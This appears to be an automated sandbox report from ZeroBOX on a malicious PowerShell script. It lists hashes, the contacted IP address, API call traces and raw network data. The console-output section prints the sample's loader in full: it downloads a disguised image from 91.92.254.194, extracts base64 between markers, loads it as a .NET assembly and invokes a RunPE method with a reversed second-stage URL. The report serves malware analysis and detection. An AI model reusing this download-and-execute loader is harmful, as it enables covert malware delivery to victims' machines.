popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

file_5jjhn5s1.zo4.txt.ps1

Generic Malware Antivirus
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 July 4, 2024, 9:55 a.m. July 4, 2024, 9:57 a.m.
Size 1.3KB
Type UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
MD5 0bb85daee10c39c2eb3a05ebc874a585
SHA256 b4494b454e457c5bb20d0ec8ad6507ac6faf6f3695e9ea4917965d7e71c8e4a5
CRC32 47397348
ssdeep 24:nuGA2EiiJRCk7Lw1kfJNGkom/2PN28P8xp+DxWELCJqy:0ib1gPam/eNhP83QxvC1
Yara None matched

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
91.92.254.194 Active Moloch

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: Exception calling "Invoke" with "2" argument(s): "The requested security protoc
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: ol is not supported."
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: At line:1 char:917
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: + $link = 'http://91.92.254.194/imge/new-image_v.jpg'; $webClient = New-Object
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: System.Net.WebClient; try { $downloadedData = $webClient.DownloadData($link) }
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: catch { Write-Host 'Failed To download data from $link' -ForegroundColor Red; e
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: xit }; if ($downloadedData -ne $null) { $imageText = [System.Text.Encoding]::UT
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: F8.GetString($downloadedData); $startFlag = '<<BASE64_START>>'; $endFlag = '<<B
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: ASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageT
console_handle: 0x00000083
1 1 0

WriteConsoleW

 buffer: ext.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) {
console_handle: 0x0000008f
1 1 0

WriteConsoleW

 buffer: $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $bas
console_handle: 0x0000009b
1 1 0

WriteConsoleW

 buffer: e64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes =
console_handle: 0x000000a7
1 1 0

WriteConsoleW

 buffer: [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.R
console_handle: 0x000000b3
1 1 0

WriteConsoleW

 buffer: eflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunP
console_handle: 0x000000bf
1 1 0

WriteConsoleW

 buffer: E.Home'); $method = $type.GetMethod('VAI').Invoke <<<< ($null, [object[]] ('txt
console_handle: 0x000000cb
1 1 0

WriteConsoleW

 buffer: .HGU/99055/61.532.59.32//:ptth' , 'desativado' , 'desativado' , 'desativado','R
console_handle: 0x000000d7
1 1 0

WriteConsoleW

 buffer: egAsm','')) } }
console_handle: 0x000000e3
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x000000ef
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : DotNetMethodTargetInvocation
console_handle: 0x000000fb
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0065bb88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0065bb88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0065bb88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0065bb88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0065bb88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0065bb88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://91.92.254.194/imge/new-image_v.jpg
request GET http://91.92.254.194/imge/new-image_v.jpg
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0225b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0226f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02239000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2560
region_size: 327680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2560
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef30000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05650000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05660000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02269000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05651000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05476000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05477000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05652000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05653000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028f0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05654000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028f1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2560
region_size: 1507328
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x07760000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x07890000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x07891000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x07892000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x07893000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x07894000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05655000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05656000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05657000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05658000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0223d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05478000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05461000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05659000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Data received žžDŠ^àÍ× *»¥Ùµ'Ò8DŽˆÆ·­û^UÕ]H,^œ`&û!ŠäSgŽõ«kÝ&iN –T ªíSÅÀâÚå•Ù–3¸ßBÜ Î}<Èhîã“\Œ Wðí³BHOÞ½*ƒux/2u?f]!–=+ÊÎBî^6’:ƒßŒRHÍ°;+†ç’?ëéuzí8/¡Wª2ß&ÏJ<ýp2¼ n‹Äð)÷£wUϯé|ZIôJ%hö²¼Ð6 gË¥y—{,Çi%{{V{³<ÌcÒêc@•ƒ Qgƒó¯åêàÕT+庺‚ °aa‰èAøæ«jÕ5:e‘[€Ä2·á<u瞾ٜ¨š²Ã§H¤UÚYNÂ6óÁ‰¿Ž1¤Uµ€nZÈàû|O~Glj‰mãm‘Ô`å՗Q|mès<ê1QÅpOªQ¤’TU¢NãÀ®üfmKøf§a–&µ#ñpsó¾®5û¬ò™ïž£žÙõïû]  &’ £wde&þþ¿®|ŸW,oáò!p®¬ {àbl n€1Ý3»D9³|ƒŠy¸†à1e¦ˆ-•^râ2ÊmE¬¨5;茩Ô$ADŽYN<µXö‹Z<WL€¾âþc8’àô:Ö\¾Ä΁ùàB&àV”l#‚ª-T ďŽ)µ%vQè=¯¾2\m, ðr:}qµrR~3ÐÖÚ<÷ÆDkÒFV7U} $Šcºö¿¶:tÓ<Q<`3I·Óé /¡Úw6949ù]ðé&5fShÌ€~EIüˆ?…]jiãÓޜ—Õ·3qék;x±føºäñҀ:1UônfÚY÷"¨P:òóӃÎ"ûÉØhۏWp<‰¹[qm¯´µí?Í?‘®ÖÅ<k{v¨V{Š¬ <žWÿ|˜ƒè’?\]&0ȱ±X2;(b ^)¯Ó$ª˜­ŠãÂ]TZæ1ªcÇ#¦Oâ $²¤Vø‘Ú›M!;Oá¬2ͧן/R‚Ú8£l}ðÖË›H‚>-²Ç©›î2uz)4’úÔ´wÃW\€*`tïd‹cŽ˜‚ ËyršÚ ÑàU':¢Áˆ‰$_éðý襤nƒü9 ¤5X+ÀKY¢Ò•óY\4 Æf¤ú• ^&þl0ÍçØє*8<ˆýÐK½HSÐQÁ7YüÍ3‚ü&ÁS\Žp)3ÊàvçÚ'Šr¡Š‘Ê:äù/±ŒÑÕ׋>ø2ùÊÈHP£¯s’•cb¹±.˜F¯¨Á$e%°*zŸ†®…’*IM±J .¯ÕD Ù7Ᾰ}##H m¶l6¥Òfƒm "ºà¼7Lñy‚F»¯­ü0jšxÖ·  Ù+¸úcb$‰gT2íc҆*ï^8ÕTu¿jÀè`ó¢©g7Ï£Åü±‰B)(£pj€q5™Š± µW =²Vz-~¢EŠÀЄETDíÛ¾fO¨B΀5nººçVÞö ñW|Rm’Ì\LÔIí€T•UT±Vïl‡D#vÖ¯â aâT@©v@«÷Îbâè©^„‚}Œ¨E.Þ/¹ÍbñíUµ4l™SHªC(#h‰çœ˜'FÑIÆûœo|Š$vdì¤^bÓÀŒåå$éÅbmb»Ì­xq6äa¾¯Œ ­B™&vQDš ¸Å™ 2~#5¤³'âKãÔí€$ÜO@p3ë:±¨ôþl[‰¢;àš¤Q»é€<ŠË*H"ˆÊÖVue¨ß?<¼jOE'é€>‡ ¢Ir.á”t(H'Ÿl¥`YÈ,JŠÆV³«'È»Ü-Õá*’¤ À Ùúaô˽É, íY£0Ë°ˆúã:Wvu…˜ÿ¶mC»m`¬Êh…s««ìkŒ ™ÛRÉÚC®»ãè0ˆ6f@ƘÑ?\ÏE*á›ð¨ oŒ?˜ÒS‹®Ô/åËDÖ 04Õáã$ bÁXÐ=†f4Ë@]0ê$.P°0žq6¢BÔ@­ œs“°`A$qf«ÃÌIf&¨ñðÎwR5°À<Z©<ÒÏŚÜò1¨¹iTƒÐøˆŸpU-êøwÇbZ(á[“d‘ÆÓÄ]#e6yïó«iÔ%@º§#ê»è£`^ӐÊv©<‹^ø5)*òAàbí©DpŠÀ
Data sent GET /imge/new-image_v.jpg HTTP/1.1 Host: 91.92.254.194 Connection: Keep-Alive
host 91.92.254.194
Time & API Arguments Status Return Repeated

send

 buffer: GET /imge/new-image_v.jpg HTTP/1.1 Host: 91.92.254.194 Connection: Keep-Alive
socket: 1540
sent: 83
1 83 0